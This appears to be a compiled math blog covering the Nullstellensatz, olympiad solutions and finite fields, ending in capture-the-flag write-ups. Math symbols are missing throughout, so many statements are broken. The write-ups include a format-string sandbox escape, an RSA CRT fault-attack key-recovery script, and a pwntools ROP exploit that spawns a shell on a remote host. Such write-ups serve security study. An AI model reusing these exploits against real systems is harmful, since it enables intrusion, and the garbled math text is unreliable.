Nullstellensatz: Let be an algebraically closed field and an ideal of . Then is maximal if and only if .
It is not hard to see that is a maximal ideal. We can compute an isomorphism by looking at the surjective ring map . It remains to show that all maximal ideals are of this form. We will prove a subset of cases for as follows.
Cheap Nullstellensatz: Let be an algebraically closed field of uncountable cardinality and an ideal of . If is maximal then .
Proof: We do it in a few parts.
If is a non-trivial extension of (i.e. ), then must have a transcendental element , and for all non-zero . Thus, we can define the map and we claim this is an embedding of into . It is clearly well-defined because if , then we never divide by zero. It is also easy to check that this is a ring map, and because , its kernel is , so it is injective.
We clear denominators and call the resulting function , or
Now consider the ring homomorphisms sending to and for all , compute
The product is a product of non-zero elements and thus invertible, so we can calculate for all , and thus the set is linearly independent of uncountable cardinality, so has uncountable dimension over .
for some , so is a sub-algebra of the free algebra . The free algebra has a countable basis, so must also have countable dimension.
We now have all the building blocks to finish the proof. We notice that is a finitely generated -algebra, and its quotient field must also be a finitely generated field extension. If is a transcendental extension, then it has uncountable dimension over because it contains as a subfield, but this dimension is also countable because is finitely generated. Thus cannot be transcendental so it must be an algebraic extension, but is algebraically closed so .
If , prove that the polynomial
has no positive roots.
Solution A1: We appeal to a strategy similar to the one used in IMO 2012 Problem 2. Write
In particular, for , this implies
so , with equality only at . Thus , which is equivalent to saying that has no positive roots.
Problem 4: A site is any point in the plane such that and are both positive integers less than or equal to .
Initially, each of the sites is unoccupied. Amy and Ben take turns placing stones with Amy going first. On her turn, Amy places a new red stone on an unoccupied site such that the distance between any two sites occupied by red stones is not equal to . On his turn, Ben places a new blue stone on any unoccupied site. (A site occupied by a blue stone is allowed to be at any distance from any other occupied site.) They stop as soon as a player cannot place a stone.
Find the greatest such that Amy can ensure that she places at least red stones, no matter how Ben places his blue stones.
Solution 4: The given condition is equivalent to placing knights on a chessboard, with one party blocking a space every other turn. It is well known that on a chessboard you can place knights by placing knights on the black squares in the rows, and this is easily discoverable by playing around with placements for a bit. Thus, if Ben blocks a placement every other turn, we can only place pieces on half of the squares described above, so for the case of a board, we conjecture that .
It remains to show that is indeed impossible. To do this, we show that , or that Ben can play in a way such that Amy can only place at most stones. To do this, we study the grid (tiled times) as distinct -cycles as follows:
If Amy places a stone in , Ben will place his stone in the opposite corner of . This ensures that Amy can no longer place any more stones in . Since there are regions per grid, Amy can only place stones per grid. Thus, Amy can place a maximum of stones if Ben plays in this manner, and we are done.
Problem 5: Let be an infinite sequence of positive integers. Suppose that there is an integer such that for each , the number
is an integer. Prove that there is a positive integer such that for all .
Solution 5: The key to this problem is to use a size argument on -adic valuations to guarantee convergence of the . We consider two consecutive sums, whose difference
must be an integer because the two sums are integers. Let , where are defined as but . This is the standard -adic valuation. Note that because this difference is an integer, its -adic valuation must be non-negative. This is a fact that will be used repeatedly.
Now for all primes , consider
For this case, we have , meaning that the remaining terms in the difference must also satisfy
The trick here is to figure out where goes. If , then which is bad because . Else if , then which is also bad because . We start at the base case and inductively go onwards to show this for all .
and
We also wish to rank somewhere between and to get eventual constancy. We claim that
Clearly is impossible by assumption, so we wish to invalidate the case . In this case, we have so in order for the of the difference to be non-negative, the of the other two terms must agree, or
a contradiction. Thus by induction (again) we have shown that is eventually constant.
Combining both these claims yields the desired result. For each of the finitely many primes dividing , eventually becomes constant. Combined with the fact that for all , this implies that for all eventually, and because of this must be constant.
A caveat, as noted by v_Enhance: we need the non-increasing condition in the first claim, because otherwise setting , where is a good sequence and is the -th prime, contradicts the claim.
Problem 1: Let be the circumcircle of acute-angled triangle . Points and lie on segments and , respectively, such that . The perpendicular bisectors of and intersect at the minor arcs and of at points and , respectively. Prove that the lines and are parallel (or are the same line).
Solution 1: This was more of an exercise in angle chasing than an actual problem and felt really out of place, even for a problem 1.
Extend and to and on , respectively. The goal is to show that are concyclic. Then, by using transversal , we have
which solves the problem. We do this with more angle chasing. Compute
Also compute
This gives us the relation and similarly . This is sufficient to show that lie on the circle centered at passing through points so is cyclic and we are done.
Problem 2: Find all integers for which there exist real numbers , such that and and
for .
Solution 2: This problem seemed kind of easy for a problem 2, or maybe I’m just getting better at math despite not doing any contest math for several years now.
We start by examining the case . We have the equations
We can substitute for in the third equation to obtain
which implies either or . Let’s just say for now that . Then and , so are the roots of the polynomial . We then notice that the sequence will go on as indefinitely, so is definitely valid.
This raises the question: are these the only solutions? This suggests looking at the indices modulo , and there are only a few ways to obtain some nice looking equalities from the given conditions involving , , and . First, we know from the condition that . If we substitute , we obtain
which strongly suggests that there is something going on between and . When you have a general equality and you have no idea what to do with it, taking the sum is usually not a bad choice, so we do that here to obtain (we also extend the sequence so that it is infinite with a cycle of length ):
The equality really suggests that the sequence should be cyclic with length , so let's try to prove it! Recall the AM-GM inequality: if we have non-negative numbers , then . We apply it to the LHS to obtain . Taking the sum over the first terms, we have
Since the two sides are actually equal by the previous computation, the equality condition of AM-GM must be met, or . Thus the cycle length divides , so it must either be three or one. We have seen previously that three works, so we focus our efforts on one. A cycle length of one means that the sequence is constant, or and
but that equation has no real roots.
The answer is then all such that .
Theorem: Let be the number of monic irreducible polynomials in . Then
Proof:
Consider the following zeta function.
There are only monic polynomials of degree so
Monic polynomials have a unique factorization into monic irreducible factors; after some computation, we can arrive at
where are the monic irreducible polynomials of . We can then compute the equality
Recall that . Substituting, we get
Let us examine the coefficient of of the LHS. We compute
or
as desired.
We now construct finite fields in a different way.
Theorem: Any field has an algebraic closure and its closure is unique up to isomorphism.
Proof: This is actually a fun exercise and proofs of this result can be found almost everywhere.
Theorem: Let be the algebraic closure of . Let , where is a power of . Then is the unique field with elements contained in .
Proof: We first verify that is a field. Namely, and . clearly has elements because splits into linear factors over , and those factors are distinct (compute the gcd with the derivative).
Now let be some other subfield of with elements. is a group with elements so we have , and we can trivially extend this to for , so . But , so .
We can rephrase the above theorem as follows. is the splitting field of the polynomial over .
Theorem: Let be an arbitrary finite field with elements. Let be an irreducible polynomial of degree and let be one of its roots. Then is a field with elements.
Proof: This is a standard exercise with respect to field extensions.
Anyways, now for some problems.
Problem 1: (IMO Shortlist 1989) Suppose an integer sequence satisfies
for all . Prove that for all .
Solution: Let us compute the Möbius inversion. We get
Recall that elements of satisfy the polynomial . We count the number of elements of order precisely . Namely, we need to subtract off elements of orders with (can you see why?). We can do this with PIE, which is precisely the formula above. So is the number of elements in with order . Now consider the set of minimal polynomials of these elements. They must have degree , otherwise they would also belong in for some , and each of these polynomials has distinct roots in , so we are done.
Problem 2: (IMO Shortlist) Let , . If and , show that .
Solution: We first obtain a formula for . Check that
This means that , or . Set to obtain , so
Let be a prime factor of . Pick some in such that . Notice
so and . Define a map given by . This is a ring homomorphism. Let . are non-zero because . Additionally, . Now compute
Therefore and the order of MUST be (otherwise is impossible), so . Suppose . Then we know that so trivially . Now suppose not. Then are roots of irreducible . Raising the equality to the -th power, we get that . If , then is either or . If , then so we must have the latter, , which implies . But then, , so we trivially obtain .
Problem: (China TST 2008) Let . Let be an odd prime and be a prime divisor of . Prove that if , then .
Solution: Compute
Like before, we can take in and define the ring homomorphism . Let and . We clearly have
Compute and using a similar trick in the previous problem, compute
so . Let us focus on the equality . If , then the order is either , , or . If the order is , then and , and squaring yields , which is only true in , but . If the order is , then , so or . If , then forces ( is an odd prime). Similarly, if , then . If the order is , then , or , or or , both of which eventually give the desired inequality. Notice that this only works if is not a quadratic residue mod . However, if is a quadratic residue mod , then we get either or , both of which yield the desired result.
We say a field with multiplicative identity has characteristic if . If no such sum is ever zero (the additive order of the identity is infinite), then it has characteristic 0. We are primarily interested in the finite case.
We get this nice little corollary: Let be a field of positive characteristic . Then is prime.
Proof: Suppose is not prime. Then and , so has zero divisors and is not a field.
Here is another really easy to understand corollary: Let be a field of characteristic . Then is a vector space over .
Proof: Trivial. Just write out the canonical action via and everything just works.
If you’ve taken any sort of linear algebra, we now realize that because is finite dimensional over , we can write , and the standard notation for this is .
The obvious question now is: given , can we construct a field of that size? The answer is yes. Let be an irreducible polynomial in of degree . I claim is a field of size and characteristic .
Proof: Characteristic is quite easily seen because of the base ring taking coefficients in . To see that this quotient has elements, we can see that each of the polynomials of of degree less than are distinct and there are precisely of those. For polynomials of degree at least , we can replace them with polynomials of degree less than , so this works. More precisely, for each term of degree , we can find a polynomial of of degree such that has degree less than because is a field and we repeat until the degrees are within the desired range.
Okay, so this is at least a ring, but how are we so sure that it is a field? One easy way to see this comes from the theory of commutative rings. If is a commutative ring and is a maximal ideal, then is a field, and is maximal if and only if is irreducible (the ideal generated by one of the factors is a “larger” ideal). We will prove the previous statement.
Proof: Let be commutative and be a maximal ideal. Let be non-zero so that is non-zero. Define . This is clearly non-empty so take and write , where it becomes quite obvious that . Now take some , compute , so is also an ideal. On the other hand, we have , but and , so , but is maximal so , so , or there exists such that , or , and .
So now all that remains is to show that there is always some irreducible polynomial and we can always construct a finite field. We will need the following useful theorems.
Theorem 1: If is a finite field, then the group of units is cyclic and there is a generator with order .
Proof: We follow the classical proof of showing the existence of primitive roots modulo . In fact, this is precisely the analogous statement for primitive roots modulo but for finite fields.
Let . For all , we define the set . Any element has an order that divides , so this forms a partition. Namely,
I claim for any we have . If is empty we are done, so pick any element of order from . In particular, this means that are distinct solutions of . This polynomial has at most solutions in and thus in as well (it's easy to check that zero is not a solution). Hence if we pick an arbitrary , there exists some such that , but the order of is precisely , so . The set has precisely elements, and is a subset of that, which gives us the result.
We then recall that the sum
This implies that via a simple size argument. In particular, we now know that and any element of should generate by definition.
Theorem 2: The product of all irreducible monic polynomials such that is .
Proof: Let be this product. is squarefree in because it is relatively prime to its derivative, which is . Thus to show that , we only need to show that they share the same monic irreducible factors.
Let be a monic irreducible factor of of degree . Then is a finite field with elements. I claim that for all . Write . We have, by the freshman's dream (the Frobenius map is additive in characteristic ), the following computation.
where the final equality stems from the fact that . Now pick of order , so we obtain , so monic irreducible factors of have degree that divides .
Now take some that is monic, irreducible, and of degree . Take as a field with elements, so . Since , we easily obtain , which is what we needed.
Corollary: If is the number of monic irreducible polynomials in of degree , then
Proof: We know that is the product of all monic irreducible polynomials with degree dividing . Taking the degrees of both sides of this equality yields
which is precisely what we wanted.
Another corollary: for all .
Proof: We take the Möbius inversion of the above equality. In particular, this yields,
Note that so the RHS is most definitely positive, so .
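The two counting results above (the zeta-function theorem earlier on this page and the Möbius corollary just proved) can be checked by machine. The following is an added example, not code from the original post: it evaluates the Möbius formula for general q and n, then brute-forces the monic irreducible polynomials over F_2 by trial division (a polynomial is packed into an int, bit i being the coefficient of x^i) and also multiplies out the product from Theorem 2 to confirm it equals x^(2^n) - x. The function names are my own.

```python
def mobius(n):
    """Möbius function: 0 if n has a squared prime factor, else (-1)^(number of primes)."""
    result, p = 1, 2
    while p * p <= n:
        if n % p == 0:
            n //= p
            if n % p == 0:
                return 0
            result = -result
        p += 1
    return -result if n > 1 else result


def divisors(n):
    return [d for d in range(1, n + 1) if n % d == 0]


def count_irreducible(q, n):
    """Number of monic irreducible polynomials of degree n over F_q:
    (1/n) * sum_{d | n} mu(d) q^(n/d), the Möbius inversion of sum_{d | n} d*N_d = q^n."""
    return sum(mobius(d) * q ** (n // d) for d in divisors(n)) // n


# Brute force over F_2 as an independent check. A polynomial is an int whose bits
# are its coefficients, so its degree is bit_length() - 1 and subtraction is XOR.
def poly_mod(a, b):
    """Remainder of a divided by b in F_2[x]."""
    db = b.bit_length() - 1
    while a and a.bit_length() - 1 >= db:
        a ^= b << (a.bit_length() - 1 - db)
    return a


def poly_mul(a, b):
    """Product in F_2[x] (carry-less multiplication)."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        b >>= 1
    return r


def is_irreducible_f2(f):
    """Trial division by every polynomial of degree 1 .. deg(f)//2."""
    n = f.bit_length() - 1
    if n < 1:
        return False
    return all(poly_mod(f, g) != 0 for g in range(2, 1 << (n // 2 + 1)))


def irreducibles_f2(n):
    """All monic irreducible polynomials of degree n over F_2 (every nonzero poly is monic)."""
    return [f for f in range(1 << n, 1 << (n + 1)) if is_irreducible_f2(f)]


def product_of_irreducibles_dividing(n):
    """Theorem 2: the product of all irreducible f with deg f | n is x^(2^n) - x."""
    r = 1
    for d in divisors(n):
        for f in irreducibles_f2(d):
            r = poly_mul(r, f)
    return r


if __name__ == "__main__":
    for n in range(1, 9):
        print(n, count_irreducible(2, n), len(irreducibles_f2(n)))
    print(hex(product_of_irreducibles_dividing(4)))  # x^16 + x
```

The brute force is only feasible for small degrees, but that is enough to see the formula, the product theorem and the corollary sum_{d | n} d*N_d = q^n all agree; for q = 2 and n = 8 the count is 30, and the AES polynomial x^8 + x^4 + x^3 + x + 1 (0x11b) is one of them.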
All that is really left to show for basic properties of finite fields is that they are unique up to isomorphism. Namely, if are both irreducible polynomials of the same degree, then . I leave this as an exercise to the reader.
So why finite fields? Well, a lot of modern cryptography is done over finite fields. Namely, AES does computations in . Elliptic curves can also be defined over any field. In particular, cryptography is interested in the case where the fields are finite. Elliptic curves over present a lot of rich structure as well, but are not of any real cryptographic use to my knowledge. More specifically, standard ECC and ECDH can be done over any finite field, but in the case of SIDH (supersingular isogeny Diffie-Hellman), our curves are over . Visually, it makes absolutely no sense to visualize polynomials as coordinate points, but the algebra checks out and that's all you really need to care about. Visualizations over and maybe should give you enough intuition to work in other fields. Anyways, I am excited to see more uses of finite fields to confuse a bunch of aspiring CS students as well as whatever people will use it for in the future.
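To make the quotient construction, the cyclic unit group (Theorem 1) and the AES remark concrete, here is an added example that is not part of the original post. It builds GF(2^8) = F_2[x]/(x^8 + x^4 + x^3 + x + 1) exactly as above: an element is the remainder of degree less than 8, packed into the bits of an int, addition is XOR, multiplication is shift-and-add followed by reduction by the modulus, and inverses come from a^254 = a^-1 because the unit group has 255 elements. It also brute-forces the claim that the quotient is a field only when the modulus is irreducible, and lists the generators of the cyclic group. All function names are my own.

```python
AES_POLY = 0x11B  # x^8 + x^4 + x^3 + x + 1, the irreducible polynomial AES uses


def gf_add(a, b):
    """Addition is coefficient-wise mod 2, i.e. XOR (characteristic 2)."""
    return a ^ b


def gf_mul(a, b, mod=AES_POLY):
    """Multiply, reducing modulo `mod` (which must have degree exactly 8)."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        b >>= 1
        a <<= 1
        if a & 0x100:        # degree reached 8: subtract (XOR) the modulus
            a ^= mod
    return r


def gf_pow(a, e, mod=AES_POLY):
    """Square-and-multiply exponentiation."""
    r = 1
    while e:
        if e & 1:
            r = gf_mul(r, a, mod)
        a = gf_mul(a, a, mod)
        e >>= 1
    return r


def gf_inv(a, mod=AES_POLY):
    """The unit group has 255 elements, so a^255 = 1 and a^254 = a^-1."""
    if a == 0:
        raise ZeroDivisionError("0 has no inverse")
    return gf_pow(a, 254, mod)


def order(a, mod=AES_POLY):
    """Multiplicative order of a nonzero element (mod must be irreducible); divides 255."""
    k, x = 1, a
    while x != 1:
        x = gf_mul(x, a, mod)
        k += 1
    return k


def generators(mod=AES_POLY):
    """Elements of order 255: the generators of the cyclic group GF(2^8)^* (Theorem 1)."""
    return [a for a in range(1, 256) if order(a, mod) == 255]


def is_field(mod):
    """Brute-force check that F_2[x]/(mod) is a field: every nonzero class needs an
    inverse. This fails exactly when mod is reducible, since its factors become
    zero divisors in the quotient (the maximal-ideal argument above)."""
    return all(any(gf_mul(a, b, mod) == 1 for b in range(1, 256))
               for a in range(1, 256))


if __name__ == "__main__":
    print(hex(gf_mul(0x57, 0x83)))      # the FIPS-197 worked example, 0xc1
    print(hex(gf_inv(0x53)))            # 0xca, the inverse used by the S-box for 0x53
    print(order(2), order(3))           # x has order 51; x + 1 generates the whole group
    print(len(generators()))            # phi(255) = 128 generators
    print(is_field(AES_POLY), is_field(0x101))  # x^8 + 1 = (x + 1)^8 is reducible
```

The same shift-and-add multiplier works for any degree-8 modulus, which is why `is_field` can be run on a reducible one: with 0x101 the class of x + 1 has no inverse, so the quotient is only a ring, matching the maximal-ideal criterion proved above.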
machines[i].__init__.__globals__
had our flag, so as long as we could get our format string to contain “machine” after the check, we are in the clear. Luckily, there are 3 hex characters in “mAChinE”, so setting our data pointer to 0xAC, 0xA, 0xC, 0xE with the corresponding %x in the correct place in the format string “{machine.__init__.__globals__[flag]}” would print out the flag. The reference solution is posted below.
from interpreter import interpret_program

prog = ">" * 0xac                      # move the data pointer to 0xac
format_attack = "{m%xhine.__init__.__globals__[flag]}"
for char in format_attack:             # write the format string, one byte per cell
    prog += "+" * ord(char) + ">"
prog += "<" * len(format_attack)       # rewind to the start of the string
prog += '.'                            # output it: %x expands to "ac" after the check
interpret_program(prog)
print(prog)
from binascii import hexlify
from fractions import gcd
import rsa

pub, priv = rsa.newkeys(2048)
with open('flag.txt') as f:
    flag = f.read()

signme = 1337
q = priv.q
p = priv.p
d = priv.d
e = priv.e
n = priv.n

# RSA signatures are way too slow I'm gonna go sanic
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

# CRT signing: note that the q half reuses d % (p - 1) instead of d % (q - 1)
s1 = pow(signme, d % (p - 1), p)
s2 = pow(signme, d % (p - 1), q)
qinv = modinv(q, p)
h = (qinv * (s1 - s2)) % p
s = s2 + h * q

print "parameters:"
print e
print n
print "signed 1337 with"
print s
print "encrypted flag"
print hexlify(rsa.encrypt(flag, pub))
Initially, you should try to verify the signature and compute , and realize that it is not . We eventually notice that , which is incorrect, so we pull out a pencil and paper and calculate.
We can then just compute to get , where is taken modulo . The chances of are really small, so this works most of the time.
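Here is the attack carried through end to end on a toy key, as an added example that is not part of the original write-up. The key is constructed from two Mersenne primes (not the challenge's 2048-bit key) so it runs instantly; `crt_sign` reproduces the challenge's Garner-style signing with the same wrong exponent on the q half, and `recover_factor` does the gcd step: s^e - m is 0 mod p but not mod q, so the gcd with n is p, and from p we rebuild d and can decrypt anything sent to that key. The function names are my own.

```python
from math import gcd

# Constructed toy key (not the challenge's): two Mersenne primes, large enough
# that the coincidence s^e == m mod q mentioned above is negligible.
P = 2 ** 61 - 1
Q = 2 ** 89 - 1
N = P * Q
E = 65537


def egcd(a, b):
    """Extended Euclid: (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if a == 0:
        return b, 0, 1
    g, y, x = egcd(b % a, a)
    return g, x - (b // a) * y, y


def modinv(a, m):
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError("no modular inverse")
    return x % m


D = modinv(E, (P - 1) * (Q - 1))


def crt_sign(m, d, p, q, buggy=False):
    """CRT/Garner signature s = m^d mod pq assembled from the two half-size
    exponentiations. With buggy=True the q half reuses d mod (p - 1), as in
    the challenge source, so s is right mod p and wrong mod q."""
    dp = d % (p - 1)
    dq = dp if buggy else d % (q - 1)
    s1 = pow(m, dp, p)            # == m^d mod p by Fermat
    s2 = pow(m, dq, q)            # == m^d mod q only when the exponent is right
    qinv = modinv(q, p)
    h = (qinv * (s1 - s2)) % p
    return s2 + h * q             # s == s1 (mod p) and s == s2 (mod q)


def verify(s, m, e, n):
    return pow(s, e, n) == m


def recover_factor(s, m, e, n):
    """Bellcore-style fault attack: s^e - m is divisible by p but (almost surely)
    not by q, so gcd(s^e - m, n) == p. For a correct signature it returns n."""
    return gcd((pow(s, e, n) - m) % n, n)


def recover_private_key(s, m, e, n):
    """Factor n from the faulty signature and rebuild d."""
    p = recover_factor(s, m, e, n)
    if p in (1, n):
        raise ValueError("signature was not faulty, nothing leaked")
    q = n // p
    return modinv(e, (p - 1) * (q - 1))


if __name__ == "__main__":
    good = crt_sign(1337, D, P, Q)
    bad = crt_sign(1337, D, P, Q, buggy=True)
    print(verify(good, 1337, E, N), verify(bad, 1337, E, N))   # True False
    print(recover_factor(bad, 1337, E, N) == P)                 # True
    print(recover_private_key(bad, 1337, E, N) == D)            # True
```

The check a practitioner wants before trusting any CRT signer is the cheap one on the last line of `recover_factor` turned around: verify s^e == m mod n before releasing a signature, which is exactly what a fault-hardened implementation does and what this challenge's code skips.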
Interestingly enough, every time we tried to leak the stack cookie it started with a null byte. We have a read primitive (actually just a function) at 0x80488b1 which we can leverage to read GOT entries. With this, we can grab libc addresses to fingerprint a specific version and then find offsets to the functions we want. The stack is also cleaned up by the caller, so we need to return back to the main loop to retrigger our ROP chain every time we call a new function.
#!/usr/bin/env python2
from pwn import remote, p32, u32, args, log

choicestr = "Select menu > "
inputstr = "Input Your Message : "

if args['REMOTE']:
    r = remote("110.10.212.130", 8888)
else:
    r = remote("localhost", 8181)

r.recvuntil(choicestr)

# Cookie leak (its first byte is always null, so only three bytes come back):
# r.sendline("1")
# r.recvuntil(inputstr)
# r.send("A" * 41)
# v = r.recvuntil(choicestr)
# x = v[40:]
# print x.encode("hex")
# cookie = x[1:4]
cookie = "00228d33".decode("hex")

# 40 bytes of buffer, the cookie, then three saved registers before the return address
pl_base = "A" * 40 + cookie + "BBBB" + "CCCC" + "DDDD"
loop = 0x8048a71  # back into the menu loop, so each call's return lets us overflow again

# we can use this to leak libc addresses: return into the read function at
# 0x80488b1 with a GOT entry as its argument
# log.info("print(__libc_start_main)")
# r.sendline("1")
# r.recvuntil(inputstr)
# r.send(pl_base + p32(0x80488b1) + p32(loop) + p32(0x804b03c))
# r.recvuntil(choicestr)
# r.sendline("3")
# res = r.recvuntil(choicestr)
# __libc_start_main = 0xf75ef990

# leaked address and offsets from the fingerprinted libc build
setsockopt = 0xf765c5d0
libc_base = setsockopt - 0x000ed5d0
system = libc_base + 0x00040190
binsh = libc_base + 0x00160a24
dup2 = libc_base + 0x000db590
alarm = libc_base + 0x000b54c0


def rop_call(desc, func, *fargs):
    """Overflow once: return into func(*fargs) and from there back into the menu
    loop. The caller cleans up the stack, so the arguments simply follow the
    fake return address."""
    log.info(desc)
    r.sendline("1")
    r.recvuntil(inputstr)
    r.send(pl_base + p32(func) + p32(loop) + "".join(p32(a) for a in fargs))
    r.recvuntil(choicestr)
    r.sendline("3")  # option 3 returns from the vulnerable function and fires the chain


rop_call("alarm(0)", alarm, 0)
r.recvuntil(choicestr)
rop_call("dup2(4, 0)", dup2, 4, 0)
r.recvuntil(choicestr)
rop_call("dup2(4, 1)", dup2, 4, 1)
r.recvuntil(choicestr)
rop_call("system(\"/bin/sh\")", system, binsh)
r.interactive()

# FLAG{Good_Job~!Y0u_@re_Very__G@@d!!!!!!^.^}